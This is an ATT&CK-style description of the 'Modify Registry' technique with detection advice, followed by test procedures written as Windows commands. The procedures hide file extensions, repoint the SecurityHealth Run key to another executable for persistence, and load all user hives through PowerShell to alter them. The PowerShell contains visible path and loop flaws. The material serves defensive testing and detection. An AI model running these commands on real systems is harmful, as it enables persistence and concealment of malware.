Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in Persistence and Execution.Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility Reg may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API (see examples).
The Registry of a remote system may be modified to aid in execution of files as part of Lateral Movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often Valid Accounts are required, along with access to the remote system's Windows Admin Shares for RPC communication.
Detection: Modifications to the Registry are normal and occur throughout typical use of the Windows operating system. Changes to Registry entries that load software on Windows startup that do not correlate with known software, patch cycles, etc., are suspicious, as are additions or changes to files within the startup folder. Changes could also include new services and modification of existing binary paths to point to malicious files. If a change to a service-related entry occurs, then it will likely be followed by a local or remote service start or restart to execute the file.
Monitor processes and command-line arguments for actions that could be taken to change or delete information in the Registry. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell, which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
Platforms: Windows
Data Sources: Windows Registry, File monitoring, Process monitoring, Process command-line parameters
Defense Bypassed: Host forensic analysis
Permissions Required: User, Administrator, SYSTEM
Contributors: Bartosz Jerzman, Travis Smith, Tripwire
Modify the registry of the currently logged in user using reg.exe cia cmd console
Supported Platforms: Windows
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f
Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup. This should only be possible when CMD is ran as Administrative rights.
Supported Platforms: Windows
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d {some_other_executable} /f
Modify a registry key of each user profile not currently loaded on the machine using both powershell and cmd line tools.
Supported Platforms: Windows
# here is an example of using the same method of reg load, but without the New-PSDrive cmdlet.
# Here we can load all unloaded user hives and do whatever we want in the location below (comments)
$PatternSID = 'S-1-5-21-\d+-\d+\-\d+\-\d+$'
Write-Verbose -Message 'Gathering Profile List and loading their registry hives'
# Get Username, SID, and location of ntuser.dat for all users
$ProfileList = @()
$ProfileList = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\*' | Where-Object { $_.PSChildName -match $PatternSID } |
Select @{ name = "SID"; expression = { $_.PSChildName } },
@{ name = "UserHive"; expression = { "$($_.ProfileImagePath)\ntuser.dat" } },
@{ name = "Username"; expression = { $_.ProfileImagePath -replace '^(.*[\\\/])', '' } }
# Get all user SIDs found in HKEY_USERS (ntuder.dat files that are loaded)
$LoadedHives = Get-ChildItem Registry::HKEY_USERS | ? { $_.PSChildname -match $PatternSID } | Select @{ name = "SID"; expression = { $_.PSChildName } }
$SIDObject = @()
foreach ($item in $LoadedHives)
{
$props = @{
SID = $item.SID
}
$TempSIDObject = New-Object -TypeName PSCustomObject -Property $props
$SIDObject += $TempSIDObject
}
# We need to use ($ProfileList | Measure-Object).count instead of just ($ProfileList).count because in PS V2
# if the count is less than 2 it doesn't work. :)
for ($p = 0; $p -lt ($ProfileList | Measure-Object).count; $p++)
{
for ($l = 0; $l -lt ($SIDObject | Measure-Object).count; $l++)
{
if (($ProfileList[$p].SID) -ne ($SIDObject[$l].SID))
{
$UnloadedHives += $ProfileList[$p].SID
Write-Verbose -Message "Loading Registry hives for $($ProfileList[$p].SID)"
reg load "HKU\$($ProfileList[$p].SID)" "$($ProfileList[$p].UserHive)"
Write-Verbose -Message 'Attempting to modify registry keys for each profile'
#####################################################################
reg add "HKEY_CURRENT_USER\$($ProfileList[$p].SID)\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /t REG_DWORD /v HideFileExt /d 1 /f
}
}
Write-Verbose 'Unloading Registry hives for all users'
# Unload ntuser.dat
### Garbage collection and closing of ntuser.dat ###
[gc]::Collect()
reg unload "HKU\$($ProfileList[$p].SID)"